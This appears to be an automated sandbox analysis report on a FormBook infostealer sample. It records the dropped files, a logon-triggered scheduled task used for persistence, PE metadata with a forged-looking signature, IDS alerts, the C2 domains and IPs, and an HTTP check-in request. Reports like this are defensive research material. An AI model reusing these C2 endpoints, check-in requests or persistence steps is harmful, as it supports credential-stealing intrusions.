C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dqel24pw.tmi.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o4ftytdm.uo5.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wejn4eqx.35o.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xdxiuybw.hag.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xwffkgu0.h2c.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zdpzbvd3.40p.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmpC97D.tmp

Download File

Process:	C:\Users\user\Desktop\order-payment094093.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1593
Entropy (8bit):	5.090277012419843
Encrypted:	false
SSDEEP:	24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLUxvn:cge7QYrFdOFzOzN33ODOiDdKrsuTov
MD5:	CFD45F1AE69DE6F734B53D1608EB251F
SHA1:	5511A8283B0FD6532CCEBFDF90B42ECB45BCF5B4
SHA-256:	E77F04B0E36945ED692502BE34285DCB36080EB1B75B0070AFD0FAAD672A583E
SHA-512:	39614DB5185DADC3575F313B36E9D7E8D19D72C68CBDE9D8E49A8601279FD70B8018E03E808E00150754A6E6E59EC2DA2363A2B615F3D4FFCE8DA4107D8D2E75
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run

C:\Users\user\AppData\Local\Temp\tmpF3AA.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\NFOLsr.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1593
Entropy (8bit):	5.090277012419843
Encrypted:	false
SSDEEP:	24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLUxvn:cge7QYrFdOFzOzN33ODOiDdKrsuTov
MD5:	CFD45F1AE69DE6F734B53D1608EB251F
SHA1:	5511A8283B0FD6532CCEBFDF90B42ECB45BCF5B4
SHA-256:	E77F04B0E36945ED692502BE34285DCB36080EB1B75B0070AFD0FAAD672A583E
SHA-512:	39614DB5185DADC3575F313B36E9D7E8D19D72C68CBDE9D8E49A8601279FD70B8018E03E808E00150754A6E6E59EC2DA2363A2B615F3D4FFCE8DA4107D8D2E75
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run

C:\Users\user\AppData\Roaming\NFOLsr.exe

Download File

Process:	C:\Users\user\Desktop\order-payment094093.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	778760
Entropy (8bit):	7.854862796506065
Encrypted:	false
SSDEEP:	12288:s8ImEuiETpbmqOwYG0JHK9Do7Uw82OpdYL445DR8jIQpOQgMUA23RzD1Kl4Ev5kR:s8I+b9CG0JHKG718izDa+x
MD5:	91592318966139C15E0171F341882FC8
SHA1:	A6689F85A42CE934C3E96A9088F67C48E2E1FE83
SHA-256:	2ECE30C08F63F4FDC4D7326B39AA0066938163811E35D1AEF6DDD2E0FADA475F
SHA-512:	ABFD94393776B2FC7AA418F66487813A78C18B4704A3E9FD15D0AE99F9B8A28EE7DBE28EDAFF425A7F5A85005B324262E88A638CAA098ABC2F4E7FC4E8E44D99
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 34%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...rsP...............0.............~8... ...@....@.. ....................................@.................................(8..S....@..................6........................................................... ............... ..H............text........ ...................... ..`.rsrc.......@......................@..@.reloc..............................@..B................`8......H........R..P.......B...0....G..........................................x\..5..)v\....}.9...`.x...u0...;...,.9.XG.R=...#....8B..J.V.<.J._......L...s..Kb.O=C.. [...,.$....]......[iFM..I......$z..Q.J.,c.),H.R2....N.p.Q..d>.o.c....$#.vChdJ.%.a...]...<..Y\| ......9D.....(...+T4Y...j...`.. j5.....I?..~.K...\..H.......wxB9...?7FX........Y....... EJ.......-...f..N..d..#X.......h..z<.>...d"o..... ....g.&H..W.D.E..uYT.-.,%.3.8...0../...>l..+/\|........ ..R<..kZ..t..D.zW

C:\Users\user\AppData\Roaming\NFOLsr.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\order-payment094093.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.854862796506065
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.98% Win32 Executable (generic) a (10002005/4) 49.93% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	order-payment094093.exe
File size:	778'760 bytes
MD5:	91592318966139c15e0171f341882fc8
SHA1:	a6689f85a42ce934c3e96a9088f67c48e2e1fe83
SHA256:	2ece30c08f63f4fdc4d7326b39aa0066938163811e35d1aef6ddd2e0fada475f
SHA512:	abfd94393776b2fc7aa418f66487813a78c18b4704a3e9fd15d0ae99f9b8a28ee7dbe28edaff425a7f5a85005b324262e88a638caa098abc2f4e7fc4e8e44d99
SSDEEP:	12288:s8ImEuiETpbmqOwYG0JHK9Do7Uw82OpdYL445DR8jIQpOQgMUA23RzD1Kl4Ev5kR:s8I+b9CG0JHKG718izDa+x
TLSH:	E0F4CF997BD07DDFCC27CD778B981C30EA2038A7474BC243609715A99A0D7A78F176A2
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...rsP...............0.............~8... ...@....@.. ....................................@................................

File Icon


Icon Hash:	63619999990929d3

Static PE Info

General

Entrypoint:	0x4b387e
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x9B507372 [Sun Jul 28 00:55:14 2052 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	13/11/2018 01:00:00 09/11/2021 00:59:59
Subject Chain	CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
Version:	3
Thumbprint MD5:	DABD77E44EF6B3BB91740FA46696B779
Thumbprint SHA-1:	5B9E273CF11941FD8C6BE3F038C4797BBE884268
Thumbprint SHA-256:	4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
Serial:	7C1118CBBADC95DA3752C46E47A27438

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb3828	0x53	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xb4000	0x8dd8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xbac00	0x3608
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xbe000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xb1884	0xb1a00	f2d1278713aa2e29cf9f3d8a7d780ce5	False	0.9018695570900774	data	7.890018158963495	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xb4000	0x8dd8	0x8e00	082a83e64c589d927a84391afa72f407	False	0.2994883362676056	data	5.505981537518026	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xbe000	0xc	0x200	546425d2b7732456393dae9997fbd31a	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xb41f0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2835 x 2835 px/m	0.7730496453900709
RT_ICON	0xb4658	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 2835 x 2835 px/m	0.6668032786885246
RT_ICON	0xb4fe0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2835 x 2835 px/m	0.5128986866791745
RT_ICON	0xb6088	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2835 x 2835 px/m	0.34740663900414936
RT_ICON	0xb8630	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 2835 x 2835 px/m	0.1440127538970241
RT_GROUP_ICON	0xbc858	0x4c	data	0.7763157894736842
RT_VERSION	0xbc8a4	0x344	data	0.4270334928229665
RT_MANIFEST	0xbcbe8	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
05/08/24-09:41:14.646552	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49716	80	192.168.2.6	104.18.188.223
05/08/24-09:40:54.313998	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49715	80	192.168.2.6	3.33.130.190
05/08/24-09:40:34.397123	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49713	80	192.168.2.6	192.64.119.254
05/08/24-09:41:34.950251	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49717	80	192.168.2.6	15.197.142.173

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 8, 2024 09:40:34.195298910 CEST	49713	80	192.168.2.6	192.64.119.254
May 8, 2024 09:40:34.396734953 CEST	80	49713	192.64.119.254	192.168.2.6
May 8, 2024 09:40:34.396936893 CEST	49713	80	192.168.2.6	192.64.119.254
May 8, 2024 09:40:34.397123098 CEST	49713	80	192.168.2.6	192.64.119.254
May 8, 2024 09:40:34.598454952 CEST	80	49713	192.64.119.254	192.168.2.6
May 8, 2024 09:40:34.599569082 CEST	80	49713	192.64.119.254	192.168.2.6
May 8, 2024 09:40:34.599586964 CEST	80	49713	192.64.119.254	192.168.2.6
May 8, 2024 09:40:34.599726915 CEST	49713	80	192.168.2.6	192.64.119.254
May 8, 2024 09:40:34.600366116 CEST	49713	80	192.168.2.6	192.64.119.254
May 8, 2024 09:40:34.803009033 CEST	80	49713	192.64.119.254	192.168.2.6
May 8, 2024 09:40:54.151480913 CEST	49715	80	192.168.2.6	3.33.130.190
May 8, 2024 09:40:54.313735008 CEST	80	49715	3.33.130.190	192.168.2.6
May 8, 2024 09:40:54.313901901 CEST	49715	80	192.168.2.6	3.33.130.190
May 8, 2024 09:40:54.313997984 CEST	49715	80	192.168.2.6	3.33.130.190
May 8, 2024 09:40:54.477634907 CEST	80	49715	3.33.130.190	192.168.2.6
May 8, 2024 09:40:54.485974073 CEST	80	49715	3.33.130.190	192.168.2.6
May 8, 2024 09:40:54.485986948 CEST	80	49715	3.33.130.190	192.168.2.6
May 8, 2024 09:40:54.486119986 CEST	49715	80	192.168.2.6	3.33.130.190
May 8, 2024 09:40:54.486176968 CEST	49715	80	192.168.2.6	3.33.130.190
May 8, 2024 09:40:54.493690968 CEST	80	49715	3.33.130.190	192.168.2.6
May 8, 2024 09:40:54.493755102 CEST	49715	80	192.168.2.6	3.33.130.190
May 8, 2024 09:40:54.651783943 CEST	80	49715	3.33.130.190	192.168.2.6
May 8, 2024 09:41:14.483920097 CEST	49716	80	192.168.2.6	104.18.188.223
May 8, 2024 09:41:14.646379948 CEST	80	49716	104.18.188.223	192.168.2.6
May 8, 2024 09:41:14.646456003 CEST	49716	80	192.168.2.6	104.18.188.223
May 8, 2024 09:41:14.646552086 CEST	49716	80	192.168.2.6	104.18.188.223
May 8, 2024 09:41:14.808945894 CEST	80	49716	104.18.188.223	192.168.2.6
May 8, 2024 09:41:14.816478014 CEST	80	49716	104.18.188.223	192.168.2.6
May 8, 2024 09:41:14.816606045 CEST	49716	80	192.168.2.6	104.18.188.223
May 8, 2024 09:41:14.816816092 CEST	80	49716	104.18.188.223	192.168.2.6
May 8, 2024 09:41:14.817017078 CEST	49716	80	192.168.2.6	104.18.188.223
May 8, 2024 09:41:14.979093075 CEST	80	49716	104.18.188.223	192.168.2.6
May 8, 2024 09:41:34.786142111 CEST	49717	80	192.168.2.6	15.197.142.173
May 8, 2024 09:41:34.949620008 CEST	80	49717	15.197.142.173	192.168.2.6
May 8, 2024 09:41:34.950251102 CEST	49717	80	192.168.2.6	15.197.142.173
May 8, 2024 09:41:34.950251102 CEST	49717	80	192.168.2.6	15.197.142.173
May 8, 2024 09:41:35.112490892 CEST	80	49717	15.197.142.173	192.168.2.6
May 8, 2024 09:41:35.131859064 CEST	80	49717	15.197.142.173	192.168.2.6
May 8, 2024 09:41:35.131886005 CEST	80	49717	15.197.142.173	192.168.2.6
May 8, 2024 09:41:35.132059097 CEST	49717	80	192.168.2.6	15.197.142.173
May 8, 2024 09:41:35.132159948 CEST	49717	80	192.168.2.6	15.197.142.173
May 8, 2024 09:41:35.137319088 CEST	80	49717	15.197.142.173	192.168.2.6
May 8, 2024 09:41:35.137489080 CEST	49717	80	192.168.2.6	15.197.142.173
May 8, 2024 09:41:35.294353008 CEST	80	49717	15.197.142.173	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 8, 2024 09:40:33.894634962 CEST	49745	53	192.168.2.6	1.1.1.1
May 8, 2024 09:40:34.193762064 CEST	53	49745	1.1.1.1	192.168.2.6
May 8, 2024 09:40:53.976308107 CEST	54301	53	192.168.2.6	1.1.1.1
May 8, 2024 09:40:54.145669937 CEST	53	54301	1.1.1.1	192.168.2.6
May 8, 2024 09:41:14.066226959 CEST	51440	53	192.168.2.6	1.1.1.1
May 8, 2024 09:41:14.483038902 CEST	53	51440	1.1.1.1	192.168.2.6
May 8, 2024 09:41:34.571136951 CEST	55002	53	192.168.2.6	1.1.1.1
May 8, 2024 09:41:34.779925108 CEST	53	55002	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 8, 2024 09:40:33.894634962 CEST	192.168.2.6	1.1.1.1	0x913c	Standard query (0)	www.stairs.parts	A (IP address)	IN (0x0001)	false
May 8, 2024 09:40:53.976308107 CEST	192.168.2.6	1.1.1.1	0x9ef5	Standard query (0)	www.tuskerlogix.com	A (IP address)	IN (0x0001)	false
May 8, 2024 09:41:14.066226959 CEST	192.168.2.6	1.1.1.1	0xfa13	Standard query (0)	www.businessjp6-51399.info	A (IP address)	IN (0x0001)	false
May 8, 2024 09:41:34.571136951 CEST	192.168.2.6	1.1.1.1	0xef1e	Standard query (0)	www.stmbbill.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
May 8, 2024 09:40:34.193762064 CEST	1.1.1.1	192.168.2.6	0x913c	No error (0)	www.stairs.parts		192.64.119.254	A (IP address)	IN (0x0001)	false
May 8, 2024 09:40:54.145669937 CEST	1.1.1.1	192.168.2.6	0x9ef5	No error (0)	www.tuskerlogix.com	tuskerlogix.com		CNAME (Canonical name)	IN (0x0001)	false
May 8, 2024 09:40:54.145669937 CEST	1.1.1.1	192.168.2.6	0x9ef5	No error (0)	tuskerlogix.com		3.33.130.190	A (IP address)	IN (0x0001)	false
May 8, 2024 09:40:54.145669937 CEST	1.1.1.1	192.168.2.6	0x9ef5	No error (0)	tuskerlogix.com		15.197.148.33	A (IP address)	IN (0x0001)	false
May 8, 2024 09:41:14.483038902 CEST	1.1.1.1	192.168.2.6	0xfa13	No error (0)	www.businessjp6-51399.info	ssl1.prod.systemdragon.com		CNAME (Canonical name)	IN (0x0001)	false
May 8, 2024 09:41:14.483038902 CEST	1.1.1.1	192.168.2.6	0xfa13	No error (0)	ssl1.prod.systemdragon.com		104.18.188.223	A (IP address)	IN (0x0001)	false
May 8, 2024 09:41:14.483038902 CEST	1.1.1.1	192.168.2.6	0xfa13	No error (0)	ssl1.prod.systemdragon.com		104.18.187.223	A (IP address)	IN (0x0001)	false
May 8, 2024 09:41:34.779925108 CEST	1.1.1.1	192.168.2.6	0xef1e	No error (0)	www.stmbbill.com	stmbbill.com		CNAME (Canonical name)	IN (0x0001)	false
May 8, 2024 09:41:34.779925108 CEST	1.1.1.1	192.168.2.6	0xef1e	No error (0)	stmbbill.com		15.197.142.173	A (IP address)	IN (0x0001)	false
May 8, 2024 09:41:34.779925108 CEST	1.1.1.1	192.168.2.6	0xef1e	No error (0)	stmbbill.com		3.33.152.147	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.stairs.parts

www.tuskerlogix.com

www.businessjp6-51399.info

www.stmbbill.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49713	192.64.119.254	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 8, 2024 09:40:34.397123098 CEST	178	OUT	GET /hd05/?qN9=GZs8E2R84fNPO8q&nddt40n=yavfKy4e49Ffd16wiS2AgqQIJavWi70Zom0UgwYqzxTsl8OUGxXc+tZJJXfXWFP/06dpjDbfXA== HTTP/1.1 Host: www.stairs.parts Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 8, 2024 09:40:34.599569082 CEST	513	IN	HTTP/1.1 302 Found Date: Wed, 08 May 2024 07:40:34 GMT Content-Type: text/html; charset=utf-8 Content-Length: 162 Connection: close Location: https://www.jmpwood.com/hd05?nddt40n=yavfKy4e49Ffd16wiS2AgqQIJavWi70Zom0UgwYqzxTsl8OUGxXc+tZJJXfXWFP%2F06dpjDbfXA%3D%3D&qN9=GZs8E2R84fNPO8q X-Served-By: Namecheap URL Forward Server: namecheap-nginx Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6a 6d 70 77 6f 6f 64 2e 63 6f 6d 2f 68 64 30 35 3f 6e 64 64 74 34 30 6e 3d 79 61 76 66 4b 79 34 65 34 39 46 66 64 31 36 77 69 53 32 41 67 71 51 49 4a 61 76 57 69 37 30 5a 6f 6d 30 55 67 77 59 71 7a 78 54 73 6c 38 4f 55 47 78 58 63 2b 74 5a 4a 4a 58 66 58 57 46 50 25 32 46 30 36 64 70 6a 44 62 66 58 41 25 33 44 25 33 44 26 71 4e 39 3d 47 5a 73 38 45 32 52 38 34 66 4e 50 4f 38 71 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a Data Ascii: <a 